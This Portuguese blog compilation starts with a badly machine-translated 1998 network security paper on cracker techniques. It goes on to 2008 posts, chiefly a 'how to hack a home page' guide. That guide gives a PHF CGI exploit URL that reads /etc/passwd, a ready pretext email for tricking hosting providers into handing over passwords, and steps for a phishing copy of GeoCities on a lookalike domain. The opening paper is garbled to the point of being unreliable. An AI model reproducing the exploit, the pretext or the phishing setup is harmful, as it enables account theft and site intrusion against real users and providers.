Nesta espécie de situação o cracker avaliará exatamente que anfitriões externos ele tem acessado para, e então tentativa para identificar quaisquer espécies de confiança entre a rede associada e os anfitriões externos. Portanto se você instala TCP wrappers em todo seus anfitriões externos, que definem que unicamente festas confiadas podem conectar às portas do critical de seus anfitriões, que estão usualmente :

ftp (21), ssh (22), telnet (23), smtp (25), especificado (53), pop3 (110), imap (143), rsh (514), rlogin (513), lpd (515).

SMTP, especificado e portmapper deveria seria filtro portanto contar com papel do anfitrião está na rede.

Tal filtro tem sido proven para maciçamente reduzimos o risco de um ataque na rede associada.

Nos casos de redes com não limpam 'associadas à internet' política de segurança de rede, múltiplos-homed anfitriões e misconfigured routers existirá.
Uma falta de segmentation de rede interno vai também usualmente existe, isto faz isto um muito mais fácil para um cracker baseado na internet para ganhar o unauthorised acessa à rede associada.

mapping de rede Associado pode facilmente ocorrer se servidores do DNS externos são misconfigured, como NSS tem desempenhado penetration testa onde nós temos sido capazes de para mapa a rede associada via. tal um servidor do misconfigured DNS, por causa deste, isto é muito importante que DNS não existe entre os anfitriões na rede associada e anfitriões externos, isto está longe mais seguro para simplesmente usa IP endereça conectar para máquinas externas da rede associada e vice-versa.

Anfitriões Inseguros com interfaces de rede ativas em redes múltiplas podem ser abusadas ganhar acesso à rede associada muita facilmente.
O anfitrião inseguro faz não até mesmo tem comprometer. Isto é muito fácil para abusar um daemon de dedo em tal um anfitrião que permite transmitindo.. como usuários, hospeda e outra informação de rede pode ser colecionada identificar facilmente exploitable hospeda na rede associada, o sistema operacional de um anfitrião pode até mesmo ser determinado em muitos casos por emitir um dedo solicita para root@host, bin@host e daemon@host.

Algum crackers estão agora começando adotar técnicas com respeito às 'wardialling' de localizações associadas, tal como construindo e centros de operação de rede.

Se um cracker foi encontrar e então compromisso um servidor terminal associado, ele poderia usualmente ter um grau de acesso à rede associada, assim totalmente desviando qualquer firewalls ou filtro aquele seperate a rede associada da internet. Isto está portanto muito importante para identificar e assegura a segurança de seus servidores terminais, registrando de conexões para tais servidores está também fortemente aconselhado.

Quando tentando compreender vulnerabilidades em sistemas em rede, um ponto chave para recordar, está confiando entre os anfitriões em sua rede. Um Ou Outro através do uso de TCP wrappers, hosts.equiv arquivos, .rhosts ou . arquivos do shosts, muitas redes mais grandes são comumente atacadas por explorar a confiança entre os anfitriões.

Por Exemplo, se um attacker usa um CGI explora ver seu hosts.allow arquivo, ele pode achado que você todas conexões para seu ftp e portas do telnet de *.trusted.com. Certamente, o attacker pode então ganho acessa para qualquer anfitrião em trusted.com, e ganha acesso para seus anfitriões facilmente.

Para essas razões, isto está sempre uma boa idéia para assegurar que confiada anfitriões estão igualmente seguros de ataque remoto.

Um outro ataque que deveria seria mencionar, é a instalação de troianos e backdoors nos anfitriões associados (tal como Windows 95/98 máquinas), se os empregados têm acesso internet através de usar um proxy de aplicação e um firewall, então eles vão às vezes visita 'warez' sites para descarregar software do pirated.

Tal 'warez' sites usualmente têm software do screesaver, e outros utilitários em oferecem, que em alguns casos contêm programas do cavalo de troiano, tal como o Culto da Vaca Morta ' troiano de Orifícios Posteriores. Sobre a instalação do screensaver, o troiano infesta si mesmo dentro registro da máquina e está correndo todo tempo as botas de máquina.

No caso do troiano do BO, plugins pode ser aplicado ao troiano para fazer a máquina desempenha operações certas automaticamente, tal como conectam para servidores do IRC e unem canais, e o gostado de. Isto pode provar muito perigoso, como uma máquina do trojaned em sua rede associada podia facilmente ser controlada por alguéma na internet.

O troiano do BO está infinitamente mais efetivo se o cracker já tem acessado à rede associada, um ou outro porque ele é um empregado ou tem unauthorised acessa aos anfitriões associados. O troiano do BO podia ser instalado em todo Windows único 95/98 máquina em uma matéria de semanas se o cracker usa a estratégia correta, depois que ele terá controle remoto total acima das máquinas em pergunta, incluindo existência capaz para manipular arquivos, máquinas do reboot e formato par dirige, inteiramente remotamente.

------------------------------------------------------------------------------- 3.1 Técnicas utilizadas para 'manto' a localização do attackers ------------------------------------------------------------------------------

crackers Típico usualmente usará as seguintes técnicas para esconder seu endereço do IP verdadeiro :

- Bouncing através de previamente anfitriões comprometidos via. telnet ou rsh.
- Bouncing através do windows hospeda via. Wingates.
- Bouncing através dos anfitriões usando misconfigured proxies.

Se tal um cracker tem um modelo de sempre examinando seus anfitriões de previamente máquinas comprometidas, wingates ou proxies, então isto é aconselhável para contactar o administrador da máquina por telefone, e notifica ele dos problemas em mão. Nunca e-mail um administrador em tal um caso, porque o cracker pode simplesmente interceptar o e-mail de antemão.

O mais talented crackers que são hábil em invadir os anfitriões via.
trocas de telefone, podem uso as seguintes técnicas :

- Bouncing através de '800-number' telefone particular troca antes conectar para um ISP usando um 'cracked, 'phished' ou ' conta do carded.

- Conectando para um anfitrião por telefone, que está em volta conectada à internet.

Crackers adotando as técnicas de bouncing através de redes de telefone antes conectar à internet estão extremamente duras para seguir a pista abaixo, porque eles podiam estar literalmente em qualquer parte no mundo. Se um cracker foi usar um '800-number' dialup, ele podia discar dentro máquinas globalmente sem ter preocupar sobre o custo.

------------------------------------------------------------------------------- 3.2 probing de Rede e reunião de informação ------------------------------------------------------------------------------

Antes valor fora para atacar uma rede associada da internet, um cracker típico desempenhará algum probes preliminar de suas redes anfitriões externos apresentam na internet. Um cracker tentará ganhar externo e hostnames interno por usar as seguintes técnicas :

- Usando nslookup para desempenhar 'ls ' solicitações.
- Vê o HTML em seu webservers para identificar quaisquer outros anfitriões.
- Vê os documentos em seus servidores de FTP.
- Conecta para seu mailservers e desempenha 'expn ' solicitações.
- Manuseia usuários em seus anfitriões externos.

Crackers usualmente tenta juntar informação sobre o layout de sua rede si mesmo primeiro como oposto identificar vulnerabilidades específicas.

Por olhar resultados das perguntas listadas acima, isto está usualmente fácil para um cracker para construir uma lista de anfitriões e começam compreender os relacionamentos que existem entre eles.

Quando desempenhando esses probes preliminar, um cracker típico fará muitos pequenos erros e às vezes usam seu possuem IP para conectar para portas de suas máquinas para checar versões de sistema operacional e outros pequenos detalhes.

Se seus anfitriões são comprometidos, isto é uma boa idéia para checar seu FTP e HTTPD registra à presença de quaisquer solicitações estranhas.

------------------------------------------------------------------------------- 3.3 Identificando confiado componentes de rede ------------------------------------------------------------------------------

Crackers espera confiado componentes de rede para atacar, um componente de rede confiado está usualmente uma máquina de administradores, ou um servidor que é considerado como seguro.

Um cracker empreenderá por checar o NFS exporta de qualquer de suas máquinas nfsd que corre ou mountd, o caso sendo aqueles diretórios do critical em alguns de seus anfitriões (tal como /usr/bin, /etc e /casa por exemplo) pode ser mountable por tal um anfitrião confiado.

O daemon de dedo é freqüentemente abusado identificar confiado anfitriões e usuários, sendo usuários que freqüentemente registram dentro a máquina dos anfitriões específicos.

O cracker vai então checa suas máquinas para outros formulários de confiança, se ele pode explorar uma máquina usando uma vulnerabilidade do CGI, ele pode ganho acessa para uns anfitriões /etc/hosts.allow arquivo, por exemplo.

Depois analysing os dados dos acima checa, o cracker começará identificar confiança entre os anfitriões. O próximo passo ao cracker está identificar quaisquer anfitriões confiados que são vulneráveis para um compromisso remoto.

------------------------------------------------------------------------------- 3.4 Identificando componentes de rede vulneráveis ------------------------------------------------------------------------------

Se um cracker pode construir listas de seu externo e anfitriões internos, ele usará Linux programa tal como ADMhack, mscan, nmap e muitos scanners menores para examinar para vulnerabilidades remotas específicas.

Usuaully tais examinados de sua vontade dos anfitriões externa seja lançada de máquinas em conexões fibra-óticas rápidas, ADMhack requer correr como raiz em uma máquina do Linux, assim um cracker provavelmente usará uma máquina do Linux que ele tem ganho unauthorised acessa para e propriamente instalado um 'rootkit' em. Tal um 'rootkit' é utilizado para binários de sistema do backdoor critical para permitir o unauthorised e undetectable acessa ao anfitrião.

Os administradores de sistemas dos anfitriões que são utilizados para examinar os anfitriões associados externos usualmente têm nenhuma idéia que examina estão sendo lançados de suas máquinas, como binários tal como 'ps' e ' donetstat são trojaned para esconder examinando processos.

Outros programas tal como mscan e nmap não requer correr como raiz, e assim pode ser lançada do Linux (ou outras plataformas no caso de nmap) hospeda para efetivamente identifica vulnerabilidades remotas, embora esses examina são mais lentas, e podem não usualmente estão bemas muitas ocultas (como o attacker não necessita raiz acessa ao anfitrião como com o ADMhack).

Ambos ADMhack e mscan desempenha os seguintes tipos de checa nos anfitriões remotos :

- Um TCP portscan de um anfitrião.
- Um dump dos serviços do RPC correm via. portmapper.
- Uma listagem de exportações apresentam via. nfsd.
- Uma listagem de ações apresentam via. samba ou netbios.
- dedo Múltiplo solicita identificar contas de default.
- vulnerabilidade do CGI examinando.
- Identificação de versões vulneráveis de daemons de servidor, incluindo Sendmail, IMAP, POP3, condição do RPC e RPC mountd.

Programa tal como SATANÁS estão raramente utilizado por crackers hoje em dia, como eles são lentos.. e examina para vulnerabilidades obsoletas.

Depois ADMhack que corre ou mscan nos anfitriões externos, a vontade do cracker tem uma boa idéia de anfitriões seguros ou vulneráveis.

Se routers estão apresentando que são SNMP capaz, o mais crackers avançado adotará agressive-snmp examinando técnicas para tentar e ' força de bruto' os fios de comunidade particulares e públicos de tais dispositivos.

------------------------------------------------------------------------------- 3.5 Aproveitando componentes de rede vulneráveis ------------------------------------------------------------------------------

Assim o cracker tem identificado quaisquer anfitriões externos confiados, e também identificados quaisquer vulnerabilidades nos anfitriões externos. Se quaisquer componentes de rede vulneráveis foram identificados, então ele tentará comprometer seus anfitriões.

Um cracker paciente não comprometerá seus anfitriões durante horas normais, ele usualmente lançará um ataque entre 9pm na noite e 6am a próxima manhã, esta vontade reduzimos o likelyhood de qualquer um sabendo sobre o ataque, e dá o cracker tempo amplo para instalar o backdoors e sniffers em seus anfitriões sem ter preocupar sobre a presença de Administradores De Sistemas.

A Maioria Do crackers tem um grande acordo de tempo livre acima de fins-de-semana, e ataques são usualmente lançados então.

O cracker comprometerá um externo confiado anfitrião que pode estar utilizado como um ponto de que para lançar um ataque na rede associada. Contando Com o filtro entre a rede associada e os anfitriões associados externos, esta técnica pode ou.

Se o cracker compromete um mailserver externo, que na verdade tem acesso total para um segmento da rede associada interna, então ele pode começar trabalho em embutir ele mesmo fundamente dentro sua rede.

Para comprometer a maioria dos componentes em rede, crackers usará programas para remotamente exploram versões vulneráveis de daemons de servidor continua anfitriões externos, tais exemplos incluem versões vulneráveis de Sendmail, IMAP, POP3 e serviços do RPC tal como statd, mountd e pcnfsd.

A Maioria Das façanhas remotas utilizadas por crackers são lançadas de previamente anfitriões comprometidos, como em alguns casos eles necessitam compilar na mesma plataforma como o anfitrião eles estão estar utilizados para explorar.

Sobre executar tal um programa remotamente para explorar um daemon de servidor vulnerável continua seu anfitrião externo, o cracker usualmente ganhará raiz acessa para seu anfitrião, que na verdade pode ser abusado ganhar acesso para outros anfitriões e a rede associada.

------------------------------------------------------------------------------- 3.6 Sobre ganho acessa para componentes de rede vulneráveis ------------------------------------------------------------------------------

Depois explorando um daemon de servidor, o cracker começará um 'limpo-para cima' operação de falsificação seus anfitriões registra e ' binários de serviço do backdooring assim ele pode acessar o undetected do anfitrião mais tarde.

Primeiro ele começará implementar o backdoors, assim ele pode mais tarde acessar o anfitrião. A Maioria Do backdoors que uso do crackers são precompiled, e técnicas são adotadas mudar a data e as permissões do binário que tem sido backdoored, em alguns casos, até mesmo o filesize do novo binário é o mesmo como o binário original. Attackers ciente de FTP transfere registros podem uso o 'rcp' programa copiar o backdoored programa hospedar.

Isto é improvável que tal um cracker invadindo uma rede associada começará remendar seus anfitriões de vulnerabilidades, ele vai usualmente unicamente instala backdoors e binários de sistema do critical de troiano tal como 'ps' e 'netstat para esconder quaisquer conexões ele pode faz para e do anfitrião.

Os seguintes binários do critical estão usualmente backdoored no Solaris 2.x máquinas:

/usr/bin/login /usr/sbin/ping /usr/sbin/in.telnetd /usr/sbin/in.rshd /usr/sbin/in.rlogind

Algum crackers tem também sido conhecido colocar um .rhosts arquiva no /usr/bin diretório para permitir depósito remoto acessa ao anfitrião via. rsh e csh em modo interativo.

A próxima coisa que a maioria do crackers está checar o anfitrião para qualquer presença de registrar sistemas que podem têm registrados suas conexões ao anfitrião, ele vai então continua editar tais conexões fora de quaisquer registros encontrados no anfitrião. Isto é aconselhável para registrar para um lineprinter se a máquina é muita provavelmente para ser um alvo do prime de um ataque, como isto faz isto extremamente difícil ao cracker para editar ele mesmo dos registros.

Sobre assegurar que sua presença não tem sido registrada em qualquer caminho, o cracker continuará invadir a rede associada. A Maioria Do crackers vai não mais ambas vulnerabilidades exploradas em outros anfitriões externos se eles têm acessado à rede interna.

------------------------------------------------------------------------------- 4.1 Descarregando informação sensível ------------------------------------------------------------------------------

Se meta do cracker está descarregar informação sensível de servidores de FTP ou webservers na rede associada interna, ele pode fazer assim do anfitrião externo que está agindo como um 'ponte' entre a internet e rede associada.

Entretanto, se meta do cracker está descarregar informação sensível segurada dentro internamente anfitriões em rede, ele continuará tentar ganhar acesso para eles por abusar a confiança com o anfitrião externo ele já tem acessado para.

------------------------------------------------------------------------------- 4.2 Partindo outro confiado anfitriões e redes ------------------------------------------------------------------------------

A Maioria Do crackers simplesmente repetirá os passos aceitados seções 3.2, 3.3, 3.4 e 3.5 ao probe e ganha acesso para hospedar na rede associada interna, contando com que o cracker está tentando alcançar, troianos e backdoors pode ou em seus anfitriões internos.

Se o cracker deseja alcançar rede total acessa aos anfitriões na rede interna, ele instalará troianos e backdoors e remove registros como em seção 3.6. Crackers também instalará sniffers em seus anfitriões, esses são explicados em seção 4.3.

Se o cracker meramente deseja descarregar dados de servidores chaves, ele tomará aproximações diferentes para ganhar acesso para seus anfitriões, tal como identificando e atacando anfitriões chaves que são confiados pelo alvo servidores chaves.

------------------------------------------------------------------------------- 4.3 Instalando sniffers ------------------------------------------------------------------------------

Um extremamente caminho efetivo ao crackers para rapidamente obtem quantias grandes de usernames e senhas para internamente anfitriões em rede está usar 'ethernet sniffer' programas. Porque tal 'sniffer' programa necessidade para operar no mesmo ethernet como os anfitriões o cracker deseja ganhar acesso para, isto poderia estar ineficaz para correr um sniffer no anfitrião externo ele está usando como uma ponte.

Para '(funga' dados fluindo através a rede interna, o cracker deve desempenhar uma raiz remota compromete de um anfitrião interno que está no mesmo ethernet como um número de outros anfitriões internos. As técnicas mencionadas em seções 3.2, 3.3, 3.4, 3.5 e 3.6 são adotadas aqui, como o cracker deve comprometer e backdoor o anfitrião bem sucedidamente para assegurar que o programa do sniffer pode ser instalado e utilizado efetivamente.

Sobre comprometer, instalando um backdoor e instalando trojaned 'ps' e ' programas do netstat, o cracker deve então instala o 'ethernet sniffer' programa no anfitrião. Tais programas do sniffer são usualmente instalados nos /usr/bin ou / diretórios do dev sob o Solaris 2.x, e então modificado parecer como se eles foram instalado com todo os outros binários de sistema.

Maior 'ethernet sniffers' visita a fundo e saída para um registro na máquina local, isto é importante para recordar que o cracker vai usualmente backdoor o ' binário do ps, assim o processo notável.

Tal 'ethernet sniffers' trabalha por retorno uma interface de rede dentro ' modos do promiscuous, a interface então escuta e registra ao sniffer logfile, qualquer usernames útil, senhas ou outros dados que podem estar utilizados pelo cracker para ganhar acesso para outros anfitriões em rede.

Porque 'ethernet sniffers' são instalado no ethernets, literalmente quaisquer dados viajando através aquela rede pode ser (fungada, isto não tem viajar para ou do anfitrião em que o sniffer é instalado.

O cracker usualmente voltará uma semana mais tarde e descarrega o logfile criado pelo 'sniffer' programa. No caso de uma rede associada rompe tal como esta, isto está provavelmente que a vontade do sniffer seja montada muita bema, e dificilmente detectable a menos que uma boa política de segurança é implementada.

Um muito bom utilitário utilizado por muitos segurança-cientes Administradores é Tripwire, que é disponível de COSTA (vê seção 5.2). Tripwire faz um MD5 'impressão digital' de seu filesystem, e detectará quaisquer modificações para seus arquivos feitos por usuários do malicious ou crackers.

Para detectar interfaces de rede do promiscuous (um sinal comum de uma instalação do sniffer), a 'cpm' ferramenta disponível do CERT é muito útil, vê http://www.cert.org/ftp/tools/cpm/ para mais informação.

------------------------------------------------------------------------------- 4.4 Tomando Nota De redes ------------------------------------------------------------------------------

Se um cracker pode comprometer servidores chaves aplicações de servidor que corre tal como bancos de dados, sistemas de operações de rede ou qualquer outro ' critical de missão' funções, isto é fácil para ele para tomar nota de sua rede para um período de tempo.

Um cru, mas não técnica rara adotada por crackers tentando desabilitar funções de rede, poderiam ser apagar todo os arquivos dos servidores chaves por emitir uns 'rm -rf / &' comanda no servidor. Contando Com o sistema de cópia de segurança implementado, o sistema podia ser para algo de horas, para meses.

Se um cracker foi ganhar acesso para sua rede interna, ele podia abusar vulnerabilidades apresentam em muitos routers tal como no Cisco, Baía e Ascende marcas. Em alguns casos o cracker podia reiniciar, ou fecha routers inteiramente até um administrador foi ao reboot eles.
Isto pode causar problemas grandes com respeito a funcionalidade de rede, como se o cracker foi montar uma lista de routers vulnerável que desempenhado papeis de rede chaves (se eles estiveram utilizados no backbone associado por exemplo), então ele podia facilmente desabilitar a capacidade de rede de corporações para algum tempo.

Para essas razões, isto é muito importante que ' critical de missão' routers e servidores são sempre remendados e seguros.

------------------------------------------------------------------------------- 5.1 Sugerido leitura ------------------------------------------------------------------------------

Há muitos bons papeis disponíveis para ajudar você mantem segurança de seu externo e anfitriões internos e routers, nós recomendamos você visita o seguinte websites e olha nos seguintes livros se você deseja aprender mais sobre securing redes grandes e anfitriões :

http://www.antionline.com/archives/documents/advanced/ http://www.rootshell.com/beta/documentation.html http://seclab.cs.ucdavis.edu/papers.html
http://rhino9.ml.org/textware/

' Unix Prático & Segurança Internet' ------------------------------------

Uma boa introdução dentro Unix e segurança Internet se você realmente não tem lido muito dentro o assunto antes.

Simson Garfinkel e Spafford O'Reilly De Gene & Associa, Inc.
ISBN 1-56592-148-8

NÓS $39.95 POSSO $56.95 (UK cerca 30 libras)

------------------------------------------------------------------------------- 5.2 Sugerido ferramentas e programas ------------------------------------------------------------------------------

Há muitas boa segurança grátis programa disponível para plataformas comuns tal como Solaris, IRIX, Linux, AIX, HP-UX e Windows Nt, nós recomendamos você olha no seguinte websites para informação em tais ferramentas de segurança grátis :

ftp://coast.cs.purdue.edu/pub/tools/unix/ http://www.alw.nih.gov/Security/prog-full.html http://rhino9.ml.org/software/

Ltd De Soluções De Segurança De Rede., está também correntemente desenvolvendo um plethora de ferramentas de segurança para Unix e Windows baseado plataformas, essas vontade está disponível acima dos próximos meses poucos, sentem liberam visitar nosso site no http://www.ns2.co.uk , também tem cuidado grátis 'lite' versões de nosso software!

-------------------------------------------------------------------------------

Copyright (c) Ltd De Soluções De Segurança De Rede. 1998 Todos Os Direitos Reservados, todas marcas registradas reconhecidas

http://www.ns2.co.uk

Este documento pode ser distribuido no domínio público enquanto o acima notas de copyright permanecem intactas.

-------------------------------------------------------------------------------

COMO HACKEAR UMA HOME PAGE

2008-06-05T05:13:00.002-07:00

Nesse texto vou mostrar alguns métodos de como hackear uma home page. Queria avisar que hackear uma home page é considerado crime e que isso dá cadeia. Toda vez que você entra em um sistema seu IP fica gravado e vão poder te encontrar . Portanto antes de cometer um ato como esse eu sugiro que vocês tomem umas medidas de segurança como spoofing e etc... um ataque via browser pode ser usado o proprio ANONIMIZER. Muito cuidado!!!
ATAQUE VIA -BROWSER

O ataque via browser é com certeza o modo mais simples de se obter o arquivo passwd. É tão simples que você não precisa saber nada!
A única coisa que você tem que fazer é abrir seu browser e colocar uma URL.
Porém esse método tem 80% de chance de não funcionar! Mas não custa nada tentar
A maioria dos servidores já acharam o bug e concertaram.
Só colocar essa URL no location do seu browser :
http://Endereço_da_pagina/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Apenas isso e pronto!
HACKEANDO SERVIDORES DE HOME PAGES GRATIS (1)
Alguns servidores de home page tipo a geocities, tripod e a angelfire, dão espaço para pessoas colocarem suas home pages no ar. Há um modo bem simples de se obter a senha de home pages que estão nesses servidores.
Tudo que voce tem que fazer é mandar um e-mail pedindo
pra eles te mandarem a senha da home page.
Mas não mande um e-mail estúpido tipo : "por favor me mandem a senha".
Façam algo mais convincente e de preferencia em inglês. Pegue todas as informações da HP possíveis.
E faça do tipo :
"Mês passado eu me cadastrei no serviço de vocês e recebi uma senha e um user name e meu endereço . Eu coloquei algumas coisas no meu espaço e saí de férias. Quando voltei das ferias eu tinha me esquecido da senha!! Só me lembrava do user name, que é : "user name da HP". Fiquei um bom tempo de ferias e não pude pagar o provedor, por isso estou com um e-mail diferente do que consta no cadastro de vocês. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que vocês me mandem um e-mail para "seu e-mail". Porque eu não tenho o backup dos arquivos que coloquei lá e não gostaria de perde-los. Obrigado pela atenção. Espero que voces mandem a senha o mais rápido que puderem."
Companhias como a geocities são muito ocupadas pra ficar verificando se é verdade eu não!
Provavelmente eles irao acreditar e em 2 semanas(mais ou menos) você receberá a senha no seu e-mail... crie uma conta de e-mail anonimo com nome@hotmail.com
HACKEANDO SERVIDORES DE HOME PAGES GRATIS (2)

Outro modo de hackear esse tipo de home pages é enganar o próprio webmaster da HP! Esse modo funciona normalmente com webmasters idiotas que não sabem muito coisa e nem percebem que eles mesmos estão dando a senha para o hackeador. É outro método bem simples mas um pouco mais demorado. O que você tem que fazer é criar uma pagina onde você finge que é a geocities que esta dando mais megas para HP's! Ou seja, você terá que criar uma página imitando a geocities! Faça uma pagina exatamente no estilo da da geo. E coloque tudo com as mesmas gifs, mesmos banners e coloque um formulário pra ser preenchido e diga que quem preencher aquilo vai ganhas mais 10 megas livre de espaço pra HP!!!
Nesse formulário o cara terá que colocar o user e a senha da HP, o endereço e etc.... Para o cara "receber" os megas ele terá que enviar o formulário. Para isso ela deverá clicar em algum botão de envio, normalmente um botão que fica escrito "submit" Quando a pessoa clica no botão submit formulário é enviado para a geocities pois aquele botão tem um comando para enviar para a geocities.Então o que você terá que fazer é mudar o comando. Em vez do formulário ser enviado para a geocities esse formulário vai ser enviado para o seu e-mail. Para isso você terá que editar a pagina da geocities. No lugar que t em escrito:

Você tará que trocar para :

Então assim que o cara clicar no botão submit todos os dados seram enviados para o seu e-mail.
E assim você terá a senha.
Agora é só pegar um endereço na net e colocar essa pagina editada na geocities nele e mandar as pessoas visitarem.
E pronto! O formulário vai chegar com a senha e user name no teu e-mail.
Há uma tecnica parecida com essa mas é MUITO mais complicada.
Pra isso você vai precisar de um servidor pessoal e terá que mudar algumas configurações em TCP/IP Pra isso abra o painel de controle e entre no ícone redes.
Agora entre nas propriedades de TCP/IP.
Entre na conficuração DNS.
Selecione ativar DNS.
Agora escreva no HOST-->WWW.GEOClTIES(repare que geocities está escrito com "l" e não um "i")
Então escreva no dominio-->COM.
Agora dê OK em tudo. Vai pedir que você reinicie o micro.
Pode reiniciar.
Siga o mesmo procedimento do formulário e da pagina da geocities da explicação anterior.
Salva essa pagina e coloque-a no diretório de paginas do seu servidor.
Então voce cria um diretório chamado "members", entra nesse diretório e crie um, diretório chamado "tools". Coloque tudo da page editada nesse diretório.
Coloque seu servidor pra funcionar e mande o cara entrar em :
HTTP://WWW.GEOClTIES.COM/members/tools/file_manager.html
O endereço tem que ser esse. Se a pessoa entrar no file manager da geocities isso não vai funcionar(ooohhh!!!)
Quando o cara colocar os dados dele lá e enviar estará tudo no teu mail!

Queria avisar que esses metodos também funcionam com a angelfire e com a tripod.
A geocities foi usada como exemplo.
HACKEANDO UMA HP EM QUE VOCE JÁ TENHA CADASTRO

Esse método é realmente difícil de funcionar mas as vezes funciona com uns admins bem idiotas.
Quando você entra no seu ftp você pode sair do seu diretório home (diretorio onde você esta assim que entra) e voltar alguns diretórios até encontrar o diretório da HP que você quer hackear. Uma vez que voce já fez, se você puder ter acesso aos arquivos HTML pegue-os e edite eles! E pronto!
Com admins mais inteligentes você não consegue ter acesso os arquivos da page alvo.

EATRATÉGIA DE SEGURANÇA

2008-06-05T05:13:00.001-07:00

Essa estratégia consiste em usar programas de segurança dos mais variados para proteger suas portas de comunicações,
protegendo simultaneamente de nukes, invasões entre outros ataques...
- Você precisará ter os seguintes programas: Xô Bobus 99, NOBO versão 1.3a, 7th Sphere PortScan 1.1.
- Siga as instruções abaixo:
a) Já conectado, vá em Iniciar >> Executar >> E digite: C:\WINDOWS\Ipconfig. Aí vai aparecer os número de seu IP.
b) Agora abra o 7th Sphere PortScan 1.1 e no quadro 'Scan' coloque o número de seu IP e clique em 'Start'. Aí o programa
vai mostrar todas as suas portas abertas onde um hacker poderia aproveitar para te nukar, invadir e assim vai...
c) Instale o Xô Bobus e regule ele para proteger o maior número possível de portas de comunicação.
d) No Xô Bobus, onde diz: Porta Extra, ative esta opção e regule para proteger a sua porta 80.
e) Pode ser que o 7th Sphere PortScan 1.1 tenha indicado mais uma porta aberta que não está entre as protegidas pelo Xô
Bobus, aí você vai proteger ela com o NOBO.
f) Vá no Xô Bobus e clique em 'Remover Trojans' e ele vai procurar por trojans se encontrar vai eliminar. Depois clique em
'Vacinar', e o Xô Bobus vai vacinar seu computador contra os principais programas de Invasão.

Existem vários meios de se obter senhas de acessos. Os mais comuns estão listados abaixo

2008-06-05T05:12:00.001-07:00

Cavalo de Tróia
O hacker infiltra em seu alvo um programa semelhante a um vírus. Mas, em lugar de destruir programas e arquivos, ele tem a função de descobrir senhas. O cavalo de Tróia pode ser enviado escondido numa mensagem na Internet ou num disquete que o hacker passa, com jogos ou outros programa, para usuários do computador que quer invadir. Cada vez que o usuário escreve nome e senha, o cavalo de Tróia grava os dados. Como é programado para se conectar com seu criador, por meio do modem, em dia e hora marcados, ele transmite os dados que copiou. Elementar, para quem conhece muito bem as linguagens do computador.
Farejamento de redes
Para acelerar a sua transmissão, os dados que entram nas redes, provenientes de vários computadores, são agrupados em pacotes. O hacker cria programas farejadores que monitoram a circulação desses pacotes nas redes e procuram neles palavras como password e senha. Quando encontra, o programa copia o pacote e o envia para o computador do hacker. Os dados chegam codificados, mas isso não é problema para ele, que, em geral conhece bem criptografia, o conjunto de técnicas que permite codificar dados.
Engenharia social
É uma espécie de espionagem. Senhas com datas de nascimento, sobrenome ou nome dos filhos são muito comuns. Se o hacker tiver acesso a essas informações do usuário, vai tentá-las, como primeira opção, para descobrir sua senha. Alguns chegam a arrumar emprego temporário na empresa que pretendem invadir. Lá dentro, prestam atenção nos computadores. Ninguém cobre o teclado na hora de digitar a senha. Mesmo que tenha alguém por perto. Esse alguém pode ser um hacker.
Quebra-cabeça
Um jeito simples de desvendar senhas é a velha tentativa e erro. Para isso, o hacker cria programas capazes de montar todo tipo de combinação de letras e números. O sistema funciona bem para senhas de até seis caracteres. O processo deve levar muito tempo, porque as tentativas precisam ser feitas em períodos curtos, com grandes intervalos (dias, se for possível) entre um e outro, para não despertar suspeitas. No Brasil é um método muito difundido, pois as senhas em geral são simples e dificilmente os computadores possuem sistema de proteção.
Invasão do servidor
O hacker pode se conectar via FTP anônimo ao servidor e baixar o arquivo que contém as passwords (ex. passwd). Com esse arquivo em mãos o hacker pode descriptografá-lo usando programas específicos. Dessa forma ele obtém praticamente (a descriptografação não é 100% eficiente) todas as passwords desse provedor.
Dedução
Um hacker pode usar a lógica para descobrir senhas de acesso. Ao invés de usar o quebra-cabeça que precisa testar milhares de combinações, o hacker faz a tentativa e erro manualmente com as senhas mais prováveis. Para isso ele dispõe de três dados fundamentais:
1. Cerca de 1 em cada 30 usuários usa o login como senha.
2. Muitos administradores usam a senha padrão do sistema.
3. A maioria das senhas está relacionada ao login. Ex: login:kurt senha:cobain

HACKERS FAMOSOS

2008-06-05T05:11:00.001-07:00

HACKERS FAMOSOS

kevin David Mitnick (EUA)
O mais famoso hacker do mundo. Atualmente preso, condenado por fraudes no sistema de telefonia, roubo de informações e invasão de sistemas. Os danos materiais são incalculáveis.

Kevin Poulsen (EUA)
Amigo de Mitnick, também especializado em telefonia, ganhava concursos em rádios. Ganhou um Porsche por ser o 102º ouvinte a ligar, mas na verdade ele tinha invadido a central telefônica, e isso foi fácil demais

Mark Abene (EUA)
Inspirou toda uma geração a fuçar os sistemas públicos de comunicação - mais uma vez, a telefonia - e sua popularidade chegou ao nível de ser considerado uma das 100 pessoas mais "espertas" de New York. Trabalha atualmente como consultor em segurança de sistema.

John Draper (EUA)
Praticamente um ídolo dos três acima, introduziu o conceito de Phreaker, ao conseguir fazer ligações gratuitas utilizando um apito de plastico que vinha de brinde em uma caixa de cereais. Obrigou os EUA a trocar de sinalização de controle nos seus sistemas de telefonia.
Johan Helsingius (Finlândia)
Responsável por um dos mais famosos servidores de email anônimo. Foi preso após se recusar a fornecer dados de um acesso que publicou documentos secretos da Church of Scientology na Internet. Tinha para isso um 486 com HD de 200Mb, e nunca precisou usar seu próprio servidor.

Vladimir Levin (Rússia)
Preso pela Interpol após meses de investigação, nos quais ele conseguiu transferir 10 milhões de dólares de contas bancárias do Citibank. Insiste na idéia de que um dos advogados contratados para defendê-lo é (como todo russo neurótico normalmente acharia), na verdade, um agente do FBI. Ele não é tão feio quanto parece nesta foto.

Robert Morris (EUA)
Espalhou "acidentalmente" um worm que infectou milhões de computadores e fez boa parte da Internet parar em 1988. Ele é filho de um cientista chefe do National Computer Security Center, parte da Agência Nacional de Segurança. Ironias...

Hackeando Windows NT

2008-06-05T05:03:00.000-07:00

Hackeando Windows NT
